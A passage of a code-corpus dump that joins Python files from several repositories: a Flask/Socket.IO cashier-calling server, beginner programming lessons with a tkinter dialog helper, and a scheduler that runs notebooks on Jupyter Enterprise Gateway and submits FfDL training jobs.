load_dotenv(find_dotenv())
# Flask application
app = Flask(__name__)
# Configuration
app.config['DEBUG'] = True if environ.get('DEBUG') == 'True' else False
app.config['PORT'] = 80
# Database (db is the shared SQLAlchemy instance from modelos)
app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('DATABASE')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
# Socket.IO setup
app.config['SECRET_KEY'] = environ.get('SECRET_KEY')
DOMAIN = environ.get('DOMAIN')
async_mode = None
socketio = SocketIO(app, async_mode=async_mode)
# Shared secret each hub must send in the X-Code-Key header.
CODE_KEY = environ.get('CODE_KEY')
NAMESPACE = '/calling'
def validar_peticion(peticion):
    """
    Validate the headers of a RESTful request.
    :param peticion: Flask request object
    :return: True when valid; aborts the request (400/406) otherwise
    """
    if not peticion.is_json:
        abort(400, "Invalid request format: application/json")
    try:
        # Shared-secret check against the configured CODE_KEY.
        if peticion.headers['X-Code-Key'] != CODE_KEY:
            abort(400, "Invalid code key number")
        if len(peticion.headers['X-Serial']) <= 0:
            abort(400, "No serial number sended")
    except KeyError:
        # Either required header is missing entirely.
        abort(406, "Invalid request")
    return True
@app.route('/')
def index():
    """
    Render the home page with the available groups and cashier desks.
    :return: rendered web page
    """
    grupos = Caja.get_grupos()
    cajas = Caja.query.filter_by(estado=1).all()
    # Bootstrap-style 12-column layout split evenly among the groups.
    # BUG FIX: with no active cashiers len(grupos) == 0 and the bare
    # division raised ZeroDivisionError; fall back to full width.
    grid = 12 // len(grupos) if grupos else 12
    return render_template('index.html',
                           anio=datetime.now().year,
                           version=__version__,
                           grupos=grupos,
                           grid=grid,
                           cajas=cajas)
@app.route('/viewer', methods=['GET'])
def viewer():
    """
    Render the viewer page that displays calls for one group.
    :return: rendered web page
    """
    # Missing 'grupo' query parameter raises KeyError -> HTTP 400.
    grupo = request.args['grupo']
    return render_template('viewer3.html',
                           grupo=grupo)
@app.route('/api/v1.0/registrar', methods=['POST'])
def registrar():
    """
    Endpoint that registers a call to a cashier desk.
    :return: JSON with response code
    """
    # Validate request headers (aborts on failure).
    validar_peticion(request)
    # Cashier number from the JSON body.
    numero_caja = request.json['caja']
    # Resolve the cashier by its public number.
    caja = Caja.get_by_numero(numero_caja)
    if caja is None:
        abort(400, "Cashier number invalid")
    # Broadcast the call to the WebSocket viewers.
    llamar_caja(caja)
    # Return response
    return {"message": "ok"}, 200
@app.route('/api/v1.0/iniciar', methods=['POST'])
def iniciar():
    """
    Endpoint that records a startup of a ccs-hub device.
    :return: JSON with response code
    """
    # Validate request headers (aborts on failure).
    validar_peticion(request)
    # Reported IP of the device.
    ip = request.json["IP"]
    # Hub serial number from the validated header.
    serial = request.headers['X-Serial']
    hub = Hub.get_by_serial(serial)
    # BUG FIX: an unknown serial previously caused AttributeError on
    # hub.id (HTTP 500); reject it explicitly with a client error.
    if hub is None:
        abort(400, "Unknown hub serial")
    # Persist the startup event.
    evento = Evento(
        hub=hub.id,
        fecha=datetime.now(),
        descripcion=f"INICIADO;IP={ip}",
        estado=1
    )
    db.session.add(evento)
    db.session.commit()
    print(f"[HUB] NodeMCU con IP {ip}")
    return {"message": "ok"}, 200
@socketio.on('connect', namespace=NAMESPACE)
def conectar():
    """
    WebSocket. Emits a greeting to the client once the connection is made.
    :return: JSON message from the server
    """
    emit('servidor_conectado', {'data': 'Hi from server!'})
@socketio.on('navegador_conectado', namespace=NAMESPACE)
def test_message(message):
    """
    WebSocket handler: a viewer announced itself.
    :param message: client payload; message['grupo'] is the group it displays
    :return: None (emits an acknowledgement back to the client)
    """
    grupo = message['grupo']
    client_ip = request.remote_addr
    print(f"Cliente conectado [{client_ip}] emite para el grupo", grupo)
    emit('servidor_conectado', {'data': f"Hola. Emites para el grupo {grupo}"})
@socketio.on('llamada_realizada', namespace=NAMESPACE)
def llamada_realizada(caja):
    """
    WebSocket. Fired by the viewer once a call has been shown on screen.
    :param caja: dict payload; caja['numero'] is the displayed cashier number
    :return: None
    """
    # Persist the displayed call.
    # NOTE(review): this stores the cashier *numero* in a column declared
    # as FK to caja.id -- confirm numero and id coincide in this schema.
    registro = Registro(
        caja=caja['numero'],
        fecha=datetime.now(),
        estado=1
    )
    db.session.add(registro)
    # Commit the new row.
    db.session.commit()
    print(f"[EMIT] Registrada la caja {caja['numero']}")
def llamar_caja(caja):
    """
    Emit a 'llamar' message to connected viewers with the cashier's data.
    :param caja: Caja model instance
    :return: None
    """
    socketio.emit('llamar', {
        'numero': caja.numero,
        'grupo': caja.grupo,
        'direccion': caja.direccion,
        'audio': caja.audio
    }, namespace=NAMESPACE)
if __name__ == '__main__':
    # Bind on all interfaces. NOTE(review): app.config['PORT'] is set above
    # but not passed here -- confirm the intended listening port.
    socketio.run(app, host='0.0.0.0')
|
{"/app.py": ["/modelos.py"]}
|
27,902
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Lesson2.py
|
# Lesson 2: If Statements
from Mod2 import guiInput, guiOutput

# Read three real numbers from a single dialog (whitespace-separated).
parts = guiInput("Enter three real numbers").split()
x = float(parts[0])
y = float(parts[1])
z = float(parts[2])

# Report a sum when all three are positive, otherwise the product of
# the two values that are (presumed) positive.
if x > 0 and y > 0 and z > 0:
    guiOutput("Sum:%1.2f" % (x + y + z))
elif x < 0 and y > 0 and z > 0:
    guiOutput("Prod:%1.2f" % (y * z))
elif x > 0 and y < 0 and z > 0:
    guiOutput("Prod:%1.2f" % (x * z))
else:
    guiOutput("Prod:%1.2f" % (x * y))

# Read two integers and classify their signs.
pair = guiInput("Enter two integers").split()
a = int(pair[0])
b = int(pair[1])
if a < 0 and b < 0:
    guiOutput("Quot:%1.2f" % (a / b))
elif a > 0 and b > 0:
    guiOutput("Both integers are positive")
else:
    guiOutput("At least one integer is positive")
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,903
|
slcdiallo/pythonClass
|
refs/heads/main
|
/exampleLesson4.py
|
##### MODULE OS
# open(filename, mode) "r" is for reading, "w" for writing
# with block guarantees file is closed
# open expects file to be in cwd, otherwise you need to specify path
#with open("exdata.txt","r") as infile:
#s = infile.read() # reads the entire file as 1 string #with "with" dont need to close
#with open("output.txt","w") as outfile:
#outfile.write("this is a test\n"); # write only does strings
#outfile.write("%d\n" %40) # any formatting must be in the string
#StringIO works just like an output file but output is to a string.
#Helpful when the same output goes to different places,
#say screen and file. In Python, to create an object,
#you do not use any special type of operator like new.
#The class name followed by () will create a new object.
#So output = io.StringIO() creates a new object and names it output.
#The io. isneeded because it resides in the io module.
#import io
#output = io.StringIO()# creates a string IO object
#output.write("this a test\n")
#print(output.getvalue()) # getvalue returns the string output
##### MORE LOOPS
#g=(1,2,3) # g is a tuple, uses parentheses/any kind of info can be in tuple/you cant change them
#for x in g: # loop to print all elements in g
#print(x)
#print(x,end="") #for results in all same line
#g=(1,2,3)
#print(g[0]) #means print the first element
#for x in g:
#print(x)
#h=[4,5,6,7,"abc"] # h is a list, uses []
#print(h[4])
#for x in h: # loop to print all elements in h
#print(x)
#s="abcdefg" # s is an str
#for x in s: # loop to print the chars in s
#print(x,end="") #end="" for results in all the same line
#print(x)
##### RANGE
#for x in range(5): # think of range(5) as the sequence 0..4
#print (x) # will print 0 1 2 3 4 (separate lines)
#g=(5,6,7)
#for x in range(len(g)): # len returns number of elements in g
#print(x,g[x]) # prints elements with location OF EACH
##### WHILE LOOPS
#x=0
#while x < 5: # prints 0 1 2 3 4
#print(x)
#x+=1
#s = input("Enter a number")
#while len(s)>0: # terminates when you enter a blank line
#print(s)
#s = input("Enter another number")
##### PROGRAM 4 - EXAMPLE
# Read integers until a blank line; draw a shape sized by each integer.
while True:
    s=input("Enter another integer")
    if len(s)==0: break # break: breakout of the current loop
    width=int(s)
    if width>=4 and width<=9:
        # Vertical line: one star per row.
        for j in range(width):
            print("*")
    elif width>=10 and width<=15:
        # 'L' shape: vertical stroke, then one horizontal row.
        for j in range(width-1): #use -1 to get equal characters for each side
            print("*")
        for j in range(width):
            print("* ", end="")
    print()
# for the Excercise elif for the inner loops
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,904
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Al.py
|
# Repeatedly divide the user's number by x, truncating toward zero each step.
print('Enter a number')
usernum = int(input())
print('Enter x')
x = int(input())
# int(a / b) truncates toward zero (unlike //, which floors).
n1 = int(usernum / x)
n2 = int(n1 / x)
n3 = int(n2 / x)
print(n1, n2, n3)
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,905
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Lesson4.py
|
#Assignment 4
#Author: Saliou Diallo
#Program 4 - Simple Ascii Drawing
#Reads integers until a blank line and draws a shape for each one:
#a vertical line for 4-9, an L for 10-15, a horizontal line for 16-20,
#otherwise reports invalid input.
while True:
    entry = input("Enter another integer")
    if not entry:
        break
    width = int(entry)
    if 4 <= width <= 9:
        # Vertical line: width rows of a single star.
        print("*\n" * width, end="")
    elif 10 <= width <= 15:
        # L shape: width-1 vertical stars (equal arms), then a horizontal row.
        print("*\n" * (width - 1), end="")
        print("* " * width, end="")
    elif 16 <= width <= 20:
        # Horizontal line.
        print("* " * width, end="")
    else:
        print("Invalid input")
    print()
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,906
|
slcdiallo/pythonClass
|
refs/heads/main
|
/MyCodeL3.py
|
#For this program you will ask the user to enter the name of a text file.
#Each line in the file will contain two numbers, the first number is the price
#of each widget and the second line is the number of widgets in the order.
#For each line, print the number of items and the total price for the order (widgets*price).
#At the end, print the highest order, the lowest order, and the average order.
#Console output is sufficient.
import os

orders = []
# FIX: context manager guarantees the file is closed even if a line is
# malformed (the original left it open on any exception before close()).
with open("data3.txt", "r") as infile:
    for line in infile:
        price, count = line.split()
        price, count = float(price), int(count)
        print("Items: %1.2f (Total: %1.2f)" % (count, count * price))
        orders.append(price * count)
print("The largest order was: ", max(orders))
print("The smallest order was: ", min(orders))
print("The average order was: ", sum(orders) / len(orders))
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,907
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Mod2.py
|
import tkinter as tk
import tkinter.font as Font
# Program 2
def center(widget,relx,rely):
    """Place a top-level window on the display relative to (relx, rely).

    relx/rely are fractions of the free screen space (0.5, 0.5 centers).
    """
    widget.withdraw() # Remain invisible while we figure out the geometry
    widget.update_idletasks() # Actualize geometry information
    m_width = widget.winfo_screenwidth()
    m_height = widget.winfo_screenheight()
    w_width = widget.winfo_reqwidth()
    w_height = widget.winfo_reqheight()
    x = (m_width - w_width) * relx
    y = (m_height - w_height) * rely
    widget.geometry("+%d+%d" % (x,y))
    widget.deiconify()
def guiInput(prompt,xlen=24,relx=0.4, rely=0.4,extra=0,fntName="Calibri 14"):
    """Works like input but uses Entry, based on javax.swing.JOptionPane.showInputDialog

    Blocks in a tk mainloop until Ok is clicked or Return is pressed, then
    returns the entered text with newlines stripped.
    """
    root = tk.Tk()
    result=""
    # Callback shared by the Ok button and the Return key: capture the
    # entry text and tear down the dialog.
    def setResult(event=None):
        nonlocal result
        result = t2.get()
        root.destroy()
    caption=tk.Label(root,text="Input",bg="black",fg="white")
    caption.pack(fill=tk.X,padx=1,pady=1)
    body=tk.Frame(root)
    body.pack(padx=4)
    t= tk.Label(body,text=prompt,anchor=tk.W)
    t.pack(fill=tk.X)
    # Entry is at least as wide as the prompt, plus any extra padding.
    xlen=max(len(prompt),xlen)+extra
    t2 = tk.Entry(body,width=xlen,font=fntName)
    t2.pack(padx=4,fill=tk.X);
    t2.focus_set();
    t2.bind('<Return>',setResult)
    okbtn = tk.Button(body, text='Ok',command=setResult)
    okbtn.pack(ipadx=12,anchor=tk.E,pady=4)
    # root.overrideredirect(True)
    center(root,relx,rely)
    root.focus_force()
    root.mainloop()
    return result.replace("\n","")
def guiOutput(content:str,title="Output",ex1=None,extra=0,relx=0.4, rely=0.4,fntName="Monaco"):
    """string output to a Window, based on javax.swing.JOptionPane.showMessageDialog

    content may be a str (split on newlines) or a pre-split list of lines.
    Blocks in a tk mainloop until the Ok button is clicked.
    """
    root=tk.Tk()
    tk.Label(root,text=title,bg="black",fg="white").pack(fill=tk.X,padx=1,pady=1)
    w=content if type(content) is list else content.split(sep="\n")
    #w=content.split(sep="\n")
    xlen=0
    fnt = Font.Font(font=fntName)
    xw=0
    fntHeight=fnt.metrics()['linespace']-4;
    # Measure the widest line (in pixels) to size the window.
    for i in range(len(w)):
        glen=fnt.measure(w[i])+extra
        if glen>xw:
            xw=glen
    body=tk.Frame(root,width=xw+40,height=len(w)*fntHeight+4)
    body.pack()
    # One absolutely-placed Label per line of output.
    for i in range(len(w)):
        tk.Label(body,text=w[i],font=fnt,anchor=tk.W).place(x=17,y=i*fntHeight+4,width=xw+4,height=fntHeight)
    okbtn = tk.Button(root, text='Ok',command=root.destroy)
    okbtn.pack(ipadx=12,padx=12,anchor=tk.E,pady=4)
    okbtn.focus_set()
    # root.overrideredirect(True)
    center(root,relx,rely)
    root.wait_visibility()
    root.focus_force()
    root.mainloop()
def guiGrid(content:list,title="Output",ex1=None,extra=0,relx=0.4, rely=0.4,fntName="Calibri 16"):
    """string output to a Window, based on javax.swing.JOptionPane.showMessageDialog

    content is a list of rows, each row a sequence of cell values; cells are
    laid out in columns sized to the widest value (first 40 rows measured).
    """
    root=tk.Tk()
    tk.Label(root,text=title,bg="black",fg="white").pack(fill=tk.X,padx=1,pady=1)
    #w=content if type(content) is list else content.split(sep="\n")
    #w=content.split(sep="\n")
    xlen=0
    fnt = Font.Font(font=fntName)
    w=content
    # xw[g] holds the pixel width of the widest cell in column g.
    xw=[]
    for g in range(len(w[0])):
        xw.append(0);
    fntHeight=fnt.metrics()['linespace']-4;
    # Only the first 40 rows are measured and displayed.
    clen=min(40,len(w))
    for i in range(clen):
        for g in range(len(w[i])):
            glen=fnt.measure(w[i][g])+extra
            if glen>xw[g]:
                xw[g]=glen
    xtotal=0
    for i in xw:
        xtotal+=i+4
    body=tk.Frame(root,width=xtotal+40,height=clen*fntHeight+4)
    body.pack()
    # Decide per-column alignment: numeric-looking cells are right-aligned.
    # NOTE(review): alignment is sampled from row index 2 -- assumes at
    # least 3 rows of content; confirm callers guarantee that.
    anchors=[]
    for i in range(len(w[2])):
        s=w[2][i]
        anc=tk.W
        if type(s)==str:
            pos= s.find(".")
            if s.isnumeric() or (pos>0 and s[:pos].isnumeric() and s[pos+1].isnumeric()):
                anc=tk.E
        else:
            anc=tk.E
        anchors.append(anc)
    # Absolutely place one Label per cell.
    for i in range(clen):
        pos=17
        for g in range(len(w[i])):
            s=w[i][g]
            anc = anchors[g]
            tk.Label(body,text=w[i][g],font=fnt,anchor=anc).place(x=pos,
                y=i*fntHeight+4,width=xw[g]+4,height=fntHeight)
            pos+=xw[g]+4
    okbtn = tk.Button(root, text='Ok',command=root.destroy)
    okbtn.pack(ipadx=12,padx=12,anchor=tk.E,pady=4)
    okbtn.focus_set()
    # root.overrideredirect(True)
    center(root,relx,rely)
    root.wait_visibility()
    root.focus_force()
    root.mainloop()
def test():
    """Manual smoke test: exercises guiInput/guiOutput with ints and floats."""
    s=guiInput("Enter 2 integers",relx=0.8)
    w=s.split()
    if len(w)>0:
        x= int(w[0])
        y=int(w[1])
        guiOutput( "Input:%s\nSum %10d\nDiff %10d\n"
            "Product %10d\nQuotient%10d\nModulus %10d" % (s,x+y,x-y,x*y,x/y,x%y),
            "Results",fntName="Consolas 32",relx=0.8)
    s=guiInput("Enter 2 floats")
    w=s.split()
    if len(w)>0:
        x= float(w[0])
        y= float(w[1])
        guiOutput( "Input\t%s\nSum\t%1.2f\nDiff\t%1.2f\nProduct\t%1.2f\nQuotient\t%1.2f\nModulus\t%1.2f" % (s,x+y,x-y,x*y,x/y,x%y),
            "Results",fntName="Calibri 32",extra=40,relx=0.8)
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,908
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Lesson3.py
|
#Assignment 3
#Author: Saliou Diallo
#For this program you will ask the user to enter the name of a text file. Each line in the file will
#contain two numbers, the first number is the price of each widget and the second line is the number
#of widgets in the order. For each line, print the number of items and the total price for the order
#(widgets*price) At the end, print the highest order, the lowest order, and the average order. Console
#output is sufficient.
import os

# Running totals (avoid shadowing the builtins sum/len as the original did).
total = 0.0
count = 0
hi = 0
lo = 0
with open("data3.txt", "r") as infile:
    for s in infile:
        fields = s.split()
        price = float(fields[0])
        qty = float(fields[1])
        order = price * qty
        print ("Number of items: %3d Total price for the order: %5.2f" % (qty, order))
        total += order
        count += 1
        # BUG FIX: the original compared the running total ('sum') against
        # hi/lo, so "highest"/"lowest" tracked cumulative revenue instead of
        # the largest/smallest single order. Compare each order instead.
        if (order > hi) : hi = order
        if (lo == 0 or order < lo) : lo = order
print ("Average: %5.2f Lowest: %5.2f Highest: %5.2f" % (total/count, lo, hi))
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,909
|
slcdiallo/pythonClass
|
refs/heads/main
|
/testLesson3.py
|
import os

# Summarize orders from data3.txt: each line is "<unit price> <quantity>".
total = 0.0
count = 0
hi = 0
low = 0
with open("data3.txt", "r") as infile:
    for s in infile:
        fields = s.split()
        price = float(fields[0])
        qty = float(fields[1])
        order = price * qty
        print ("Number of items: %5d Total price for the order: %10.2f" % (qty, order))
        total += order
        count += 1
        # BUG FIX: compare each individual order, not the running total,
        # so hi/low really are the highest and lowest single orders.
        if (order > hi): hi = order
        if (low == 0 or order < low): low = order
print ("Avg", total/count, "Lowest", low, "Highest", hi)
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,910
|
slcdiallo/pythonClass
|
refs/heads/main
|
/Lesson1.py
|
#Saliou Diallo
#Reads two integers and prints their sum, difference, product, quotient,
#integer quotient, and modulus; then does the same for two real numbers
#using %-formatting with explicit widths and precisions.
print('Enter an integer')
first = int(input())
print('Enter another integer')
second = int(input())
print('Sum:', first + second, 'Difference:', first - second, 'Product:', first * second, 'Quotient:', first / second, 'Integer Quotient:', first // second, 'Modulus:', first % second)
# Modulus is the remainder: what is left over after the division.
reales = input('Enter 2 real numbers').split()
# split() yields a list of strings; convert each to float.
a = float(reales[0])
b = float(reales[1])
print('Sum %5.2f Difference %5.2f Quotient %5.2f IntegerQuotient %5.3f Modulus %5.3f' % (a+b, a-b, a/b, a//b, a%b))
# The % operator pairs a format string with a tuple of values.
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,911
|
slcdiallo/pythonClass
|
refs/heads/main
|
/exampleLesson3.py
|
from Mod2 import guiInput,guiOutput
#import os # os stand for operating system
#print(__file__) # complete path of the file being executed in the shell
#print(os.getcwd()) # cwd current working directory: The folder where the shell is running the program
#import os
#infile = open("data.txt","r") # infile is just a name # r is for read # w is for write
#s = infile.read() # read will read everything in the file, it returns a string of what is in the file
#infile.close()
#print(s) # '\n' "\n" looks exactly what is in the file
#import os
#infile = open("data.txt","r")
#for s in infile: # a for loop starts with the word for # automatically does a readline # : is a block it automatically indent
#print(s,end="")
#infile.close()
#import os
#infile = open("data.txt","r")
#for s in infile:
#s2 = s.split() # s2 is another variable # split breaks it down
#x = float(s2[0])
#y = float(s2[1])
#print (s ,x*y) # have to convert in order to do calculations
#infile.close()
#import os
#infile = open("data.txt","r")
#avg=0.0 #wanna make sure it is float
#len=0 #wanna make sure it is int
#for s in infile:
#s2 = s.split()
#x = float(s2[0])
#print (x)
#avg += x # += means add to # add x to avg # so you are adding all the first numbers
#len += 1 # add 1 to len=count of numbers
#print ("Avg", avg/len) # total of 1st numbers / count
#infile.close()
import os

# Average and maximum of the first column of data3.txt, echoed to the
# console and written to output.txt.
total = 0.0   # FIX: was named 'avg' although it holds a running sum
count = 0     # FIX: was named 'len', shadowing the builtin
hi = 0
with open("data3.txt", "r") as infile:
    for s in infile:
        s2 = s.split()
        x = float(s2[0])
        print (x)
        total += x
        count += 1
        if x > hi : hi = x # when doing highest and lowest you have to use an if
print ("Avg", total/count, "Highest", hi)
# Output to a file is almost as easy as writing to the screen; 'with'
# closes the file (the original relied on explicit close() calls).
with open("output.txt", "w") as outfile:
    outfile.write("Avg %f Highest %d" % (total/count, hi))
|
{"/Lesson2.py": ["/Mod2.py"], "/exampleLesson3.py": ["/Mod2.py"]}
|
27,947
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/tests/__init__.py
|
# -*- coding: utf-8 -*-
"""Unit test package for enterprise_scheduler."""
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,948
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/util.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import asyncio
import zipfile
def fix_asyncio_event_loop_policy(asyncio):
    """
    Work around https://github.com/tornadoweb/tornado/issues/2183

    Installs an event-loop policy whose get_event_loop() creates and
    registers a fresh loop instead of raising RuntimeError when the
    current thread has none.
    """
    class PatchedDefaultEventLoopPolicy(asyncio.DefaultEventLoopPolicy):
        def get_event_loop(self):
            """Return the current loop, creating one if the thread has none."""
            try:
                return super().get_event_loop()
            except RuntimeError:
                # Raised as "There is no current event loop in thread";
                # build a replacement loop and make it current.
                fresh_loop = self.new_event_loop()
                self.set_event_loop(fresh_loop)
                return fresh_loop
    asyncio.set_event_loop_policy(PatchedDefaultEventLoopPolicy())
def zip_directory(zip_name, directory):
    """
    Create (or overwrite) *zip_name* containing every file under *directory*.

    Files are stored flat by basename (the directory structure is not
    preserved), matching the original behaviour.

    :param zip_name: path of the zip archive to create
    :param directory: directory tree whose files are added
    """
    # FIX: context manager guarantees the archive is closed (and its
    # central directory flushed) even if a write fails part-way through;
    # the original leaked the handle on any exception before close().
    with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zip_file:
        print('> Processing resources from: ' + directory)
        for root, dirs, files in os.walk(directory):
            for file in files:
                print('> Adding file to job archive: ' + file)
                zip_file.write(os.path.join(root, file), file)
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,949
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/resources/ffdl/run_notebook.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import nbformat
import papermill as pm
print('')
print('Start notebook execution...')
try:
    # Execute notebook.ipynb with papermill; the executed copy is written
    # into RESULT_DIR so the training service collects it as a result.
    input = 'notebook.ipynb'  # NOTE(review): shadows the builtin input()
    output = os.environ['RESULT_DIR'] + '/result.ipynb'
    pm.execute_notebook(
        input,
        output
    )
    time.sleep(10)
    # Echo the executed notebook to stdout so it appears in the job log.
    with open(output, 'r') as file:
        print(file.read())
except BaseException as base:
    print('Error executing notebook cells: {}'.format(base))
print('Notebook execution done')
print('')
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,950
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/executor.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import tempfile
import time
import yaml
import requests
import nbformat
import shlex
import pkg_resources
from ffdl.client import Config
from ffdl.client import FfDLClient
from shutil import copyfile
from requests.auth import HTTPBasicAuth
from enterprise_gateway.client.gateway_client import GatewayClient
from enterprise_scheduler.util import zip_directory
from urllib.parse import urlparse
class Executor:
    """Base executor class for :
    - Jupyter
    - FFDL (Fabric for Deep Learning)
    - DLAAS (Deep Learning as a Service)"""
    def __init__(self, default_gateway_host=None, default_kernelspec=None):
        # Defaults used when a task does not carry its own gateway/kernelspec.
        self.default_gateway_host = default_gateway_host
        self.default_kernelspec = default_kernelspec
class JupyterExecutor(Executor):
    """Runs a notebook cell-by-cell on a remote Jupyter Enterprise Gateway."""
    TYPE = "jupyter"
    def execute_task(self, task):
        """Execute every cell of task['notebook'] on a kernel at task['endpoint'].

        Cell responses are stored back into each cell's outputs; the kernel
        is always shut down, even when execution fails.
        """
        # start notebook
        print('')
        print('Start notebook execution...')
        print('Starting kernel...')
        launcher = GatewayClient(task['endpoint'])
        kernel = launcher.start_kernel(task['kernelspec'])
        # Fixed wait for the kernel to come up -- TODO: poll readiness instead.
        time.sleep(10)
        # execute all cells
        try:
            print('reading notebook contents')
            notebook = nbformat.reads(json.dumps(task['notebook']), as_version=4)
            print('Starting cell execution')
            for cell in notebook.cells:
                print('Executing cell\n{}'.format(cell.source))
                response = kernel.execute(cell.source)
                print('Response\n{}'.format(response))
                # Replace the cell's outputs with the gateway response.
                outputs = []
                outputs.append(response)
                cell['outputs'] = outputs
        except BaseException as base:
            print('Error executing notebook cells: {}'.format(base))
        finally:
            print('Starting kernel shutdown')
            # shutdown notebook
            launcher.shutdown_kernel(kernel)
        print('Notebook execution done')
        print('')
class FfDLExecutor(Executor):
"""FFDL Executor Supports :
- TensorFlow
- Keras
- Caffe
- Caffe 2
- PyTorch"""
TYPE = "ffdl"
def __init__(self):
self.workdir = os.path.join(tempfile.gettempdir(), str(FfDLExecutor.TYPE))
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
rootdir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
self.runtimedir = pkg_resources.resource_filename('enterprise_scheduler', 'resources/ffdl')
print('Resources dir: {} '.format(self.runtimedir))
def execute_task(self, task):
config = Config(api_endpoint=task['endpoint'],
user=task['user'],
password="temporary",
user_info=task['userinfo'])
ffdl_zip = self._create_ffdl_zip(task)
ffdl_manifest = self._create_manifest(task)
ffdl_ui_port = "32263" ## FFDL UI hosting can vary
files = {'model_definition': ffdl_zip,
'manifest': ffdl_manifest }
client = FfDLClient(config)
result = client.post('/models', **files)
if 'model_id' in result:
print("Training URL : http://{}:{}/#/trainings/{}/show"
.format(urlparse(config.api_endpoint).netloc.split(":")[0],
ffdl_ui_port,
result['model_id']))
elif 'message' in result:
# Catches server-side FFDL errors returned with a 200 code
print("FFDL Job Submission Request Failed: {}".format(
result['message']))
elif 'error' in result:
# Catches HTTP errors returned by the FFDL server
print("FFDL Job Submission Request Failed: {}".format(
result['error']))
else:
# Cases with no error but the submission was unsuccessful
print("FFDL Job Submission Failed")
def _create_manifest(self, task):
file_name = 'manifest-' + str(task['id'])[:8]
file_location = self.workdir + '/' + file_name + ".yml"
task_description = 'Train Jupyter Notebook'
if 'notebook_name' in task:
task_description += ': ' + task['notebook_name']
manifest_dict = dict(
name=file_name,
description=task_description,
version="1.0",
gpus=task['gpus'],
cpus=task['cpus'],
memory=task['memory'],
learners=1,
data_stores= [dict(
id='sl-internal-os',
type='mount_cos',
training_data= dict(
container=task['cos_bucket_in']
),
training_results= dict(
container=task['cos_bucket_out']
),
connection= dict(
auth_url=task['cos_endpoint'],
user_name=task['cos_user'],
password=task['cos_password']
)
)],
framework= dict(
name=task['framework'],
version='1.5.0-py3',
command='./start.sh' ## Run the start script for EG and kernel
)
)
with open(file_location, 'w') as outfile:
